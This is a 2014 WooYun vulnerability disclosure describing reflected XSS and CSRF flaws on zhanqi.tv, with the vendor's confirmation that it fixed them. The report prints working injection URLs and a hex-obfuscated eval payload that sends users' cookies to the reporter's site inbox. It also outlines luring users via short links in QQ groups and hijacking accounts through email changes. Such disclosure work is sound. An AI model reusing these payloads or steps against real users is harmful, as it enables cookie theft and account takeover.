当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066242

漏洞标题:边锋某产品多处反射型xss+csrf攻击(利用站内信收cookie)

相关厂商:边锋网络

漏洞作者: 发条橙子

提交时间:2014-06-26 11:05

修复时间:2014-08-10 11:06

公开时间:2014-08-10 11:06

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-26: 细节已通知厂商并且等待厂商处理中
2014-06-30: 厂商已经确认,细节仅向厂商公开
2014-07-10: 细节向核心白帽子及相关领域专家公开
2014-07-20: 细节向普通白帽子公开
2014-07-30: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

两处反射xss,可以导致csrf攻击。

详细说明:

反射xxs#1 http://www.zhanqi.tv/u/login?redirect_on_login=xxx
redirect_on_login参数带入<script></script>
反射xxs#2
http://www.zhanqi.tv/game/6?ref=xxx
ref参数带入<script></script>
并且对参数过滤不严,可以轻易构造playload.

http://www.zhanqi.tv/game/6?ref=%27;alert('fob');'


下面针对本产品做下简单的攻击思路(验证通过):
1.核心的session做了httponly,但是别的session没做,可以考虑打cookies
2.用户后台有个人资料维护、站内短信等功能。
我这边验证的一个简单思路(用户要处于登陆状态,主要利用csrf)
A:
第一步:构造playload,利用站内信功能,发送相关用户信息(如用户名、安全邮箱、cookies)到我的站内信中。
简单的将cookies发送到指定站内信的playload

http://www.zhanqi.tv/game/6?ref=%27;v=%27\x79\x70\x2e\x61\x6a\x61\x78\x28\x27\x2f\x75\x2f\x6d\x65\x73\x73\x61\x67\x65\x2f\x73\x65\x6e\x64\x27\x2c\x20\x7b\x64\x61\x74\x61\x3a\x20\x7b\x20\x72\x65\x63\x65\x69\x76\x65\x72\x3a\x27\x67\x61\x6e\x62\x61\x69\x62\x61\x69\x27\x2c\x73\x75\x62\x6a\x65\x63\x74\x3a\x27\x61\x27\x2c\x62\x6f\x64\x79\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x7d\x2c\x20\x74\x79\x70\x65\x3a\x20\x27\x70\x6f\x73\x74\x27\x2c\x20\x64\x61\x74\x61\x54\x79\x70\x65\x3a\x20\x27\x6a\x73\x6f\x6e\x27\x7d\x29\x3b%27;eval(v);'


第二步:去用户QQ群等发送短网址,诱惑或者嘲讽用户点击

http://t.cn/RvHlPp9


第三步:利用这些信息进行攻击,也可以构造playload,对用户安全邮箱进行修改,
然后通过找回密码功能修改用户密码,劫持用户账户。
漏洞虽小但是危害还是很大的,几乎后台功能都可以直接csrf操作,比如恶搞修改用户昵称等。后台功能基本都是ajax形式实现,利用产品自带的jquery可以轻松实现。
例如发送私信:

$.post("/u/message/send",{ receiver:'ganbaibai',subject:'a',body:document.cookie})


漏洞证明:

alert.jpg


alert2.jpg


站内信收到cookies

faxin.jpg


修改用户信息无密码验证

gerenxinxi.jpg

修复方案:

针对xss,只能过滤+过滤。
针对后台功能逻辑,还是需要进行安全性校验的。

版权声明:转载请注明来源 发条橙子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-30 10:15

厂商回复:

漏洞确实存在,谢谢橙子,马上处理。

最新状态:

2014-07-08:已修复。


漏洞评价:

评论

  1. 2014-06-26 13:47 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    骚年。。。边锋不来确认!!不然我手里N多未授权都提交了

  2. 2014-06-26 19:09 | YouYaX(乌云厂商)

    难道是三国杀

  3. 2014-06-30 10:12 | 边锋网络(乌云厂商)

    @mango 最近真心忙,来了来了。